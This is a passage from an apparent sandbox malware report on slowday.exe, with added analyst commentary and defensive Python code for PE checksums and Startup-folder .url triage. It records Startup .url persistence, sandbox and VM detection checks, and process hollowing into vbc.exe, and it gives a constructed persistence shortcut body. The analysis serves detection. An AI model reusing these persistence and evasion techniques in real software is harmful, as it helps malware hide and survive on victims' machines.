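    return struct.unpack_from("<I", data, _checksum_offset(data))[0]


def pe_checksum(data: bytes) -> int:
    """The value Windows would write into CheckSum for this exact byte sequence."""
    skip = _checksum_offset(data)
    padded = data + b"\0" * (len(data) % 2)  # an odd trailing byte is summed as a word
    total = 0
    for off in range(0, len(padded), 2):
        if skip <= off < skip + 4:
            continue  # the field being computed does not contribute to itself
        total += struct.unpack_from("<H", padded, off)[0]
        total = (total & 0xFFFF) + (total >> 16)  # end-around carry
    total += total >> 16
    total &= 0xFFFF
    return total + len(data)  # the file length is folded in last, unmasked


def checksum_matches(data: bytes) -> bool:
    return stored_checksum(data) == pe_checksum(data)


def build_stub_pe(stored: int, size: int = 0x100) -> bytes:
    """Constructed 256-byte MZ/PE skeleton: only the fields the checksum reads are set."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)           # e_lfanew
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<I", buf, 0x40 + 0x58, stored)  # CheckSum
    return bytes(buf)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_stub_pe(0xE3E32)
    print(f"stored 0x{stored_checksum(blob):x}, computed 0x{pe_checksum(blob):x}, "
          f"match={checksum_matches(blob)}")
```

Because the file length is added in unmasked, the expected value grows with the file: for slowday.exe the reported 0x1f33e6 minus the 2,010,624-byte (0x1eae00) file size leaves a 16-bit fold of 0x85e6, which is why appending a payload to a stub that was already checksummed always produces a mismatch, as the last assertion in the test shows on the stub.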
            Source: C:\Users\user\Desktop\slowday.exeFile created: C:\Users\user\AppData\Roaming\winlogons\winlogons.exe
            Source: C:\Users\user\Desktop\slowday.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.url
            Source: C:\Users\user\Desktop\slowday.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.url
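winlogons.url in the per-user Startup folder is this sample's persistence (the "Drops script at startup location" Sigma hit in the overview). Explorer opens every item in that folder at logon, and an Internet Shortcut whose URL= line names a local file opens that file, so a .url pointing at an .exe is as good as a .lnk and is checked far less often. The report lists only the path of the dropped shortcut, not its body, so the shortcut text below is constructed on the assumption that it targets the dropped winlogons.exe through a file: URL. The parser and the classification are an added example, not part of Joe Sandbox or the sample, and the category names are invented.

```python
"""Triage an Internet Shortcut (.url) found in a Startup folder.

Added example, not code from Joe Sandbox or from the sample. The shortcut bodies
below are constructed; the report only names the dropped file."""
import configparser
import ntpath
import re
from typing import Optional
from urllib.parse import unquote, urlparse

# Extensions that execute when Explorer "opens" the target.
RUNNABLE = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".vbe",
            ".js", ".jse", ".wsf", ".hta", ".ps1", ".dll"}
# Locations a standard user can write to; a Startup target here is unusual.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(users\\[^\\]+\\appdata|users\\[^\\]+\\desktop|users\\public|programdata|windows\\temp)\\",
    re.IGNORECASE)


def shortcut_url(text: str) -> Optional[str]:
    """URL= value of the [InternetShortcut] section, or None if the file is not one."""
    # Only '=' may split key and value: the value itself contains ':' (file:, https:).
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # keep 'URL' as written
    try:
        cp.read_string(text.lstrip("\ufeff"))  # tolerate a UTF-8 BOM
    except configparser.Error:
        return None
    return cp.get("InternetShortcut", "URL", fallback=None)


def local_path(url: str) -> Optional[str]:
    """Normalise file: URLs and bare drive paths to a Windows path; None for web URLs."""
    if re.match(r"^[a-z]:\\", url, re.IGNORECASE):
        return url
    parsed = urlparse(url)
    if parsed.scheme.lower() != "file":
        return None
    # file:///C:/dir/x.exe yields path '/C:/dir/x.exe'; file://C:/x.exe puts the
    # drive in netloc. Join both forms, drop the leading slash, use backslashes.
    path = unquote(parsed.netloc + parsed.path).lstrip("/")
    return path.replace("/", "\\")


def assess_startup_url(text: str) -> str:
    """Classify one .url body from a Startup folder."""
    url = shortcut_url(text)
    if url is None:
        return "not_a_shortcut"
    path = local_path(url)
    if path is None:
        return "web_link"  # the normal use of a .url file
    ext = ntpath.splitext(path)[1].lower()
    if ext in RUNNABLE and USER_WRITABLE.search(path):
        return "suspicious_local_executable"
    if ext in RUNNABLE:
        return "local_executable"
    return "local_file"


# Constructed body assumed for winlogons.url; the report does not show the real one.
SAMPLE_WINLOGONS_URL = (
    "[InternetShortcut]\r\n"
    "URL=file:///C:/Users/user/AppData/Roaming/winlogons/winlogons.exe\r\n"
)

if __name__ == "__main__":
    print(local_path(shortcut_url(SAMPLE_WINLOGONS_URL)), assess_startup_url(SAMPLE_WINLOGONS_URL))
```

When sweeping a host, run this over both per-user Startup folders (the Roaming one used here) and the all-users one under ProgramData; the file: form is the common one, but a bare `URL=C:\...` also works, which is why local_path accepts both.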
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00443A61 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
            Source: C:\Users\user\Desktop\slowday.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\slowday.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\winlogons\winlogons.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\winlogons\winlogons.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: RegAsm.exe, 00000001.00000002.506893790.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
            Source: RegAsm.exe, 00000001.00000002.506893790.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT MacAddress FROM Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT MacAddress FROM Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6932 Thread sleep count: 192 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6932 Thread sleep time: -192000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5836 Thread sleep time: -1200000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 4400 Thread sleep count: 156 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 4400 Thread sleep time: -156000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6624 Thread sleep time: -1200000s >= -30000s
            Source: C:\Users\user\Desktop\slowday.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 2_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,
            Source: C:\Users\user\Desktop\slowday.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Thread delayed: delay time: 600000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Thread delayed: delay time: 600000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Thread delayed: delay time: 600000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Thread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\slowday.exe API call chain: ExitProcess graph end node
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\WCN\en-US\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\
            Source: winlogons.exe, 00000007.00000003.273619408.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmtoolsd.exe
            Source: bhvBB7.tmp.21.dr Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20220308T163148Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=1d7250d04496405b83823a4351e0ec8f&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1418351&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1418351&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
            Source: RegAsm.exe, 00000001.00000002.506628397.0000000001031000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: RegAsm.exe, 00000001.00000002.506628397.0000000001031000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 2_2_0041829C memset,GetSystemInfo,
            Source: C:\Users\user\Desktop\slowday.exe Code function: 0_2_00E2449B GetFileAttributesW,FindFirstFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 2_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 2_2_00408CAC FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00408CAC FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 2_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,
            Source: C:\Users\user\Desktop\slowday.exe Code function: 0_2_00DC4D94 LoadLibraryA,GetProcAddress,
            Source: C:\Users\user\Desktop\slowday.exe Code function: 0_2_00DF5A39 IsDebuggerPresent,
            Source: C:\Users\user\Desktop\slowday.exe Code function: 0_2_00DF5BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
            Source: C:\Users\user\Desktop\slowday.exe Code function: 0_2_00DF9922 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\slowday.exe Code function: 0_2_00DEA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
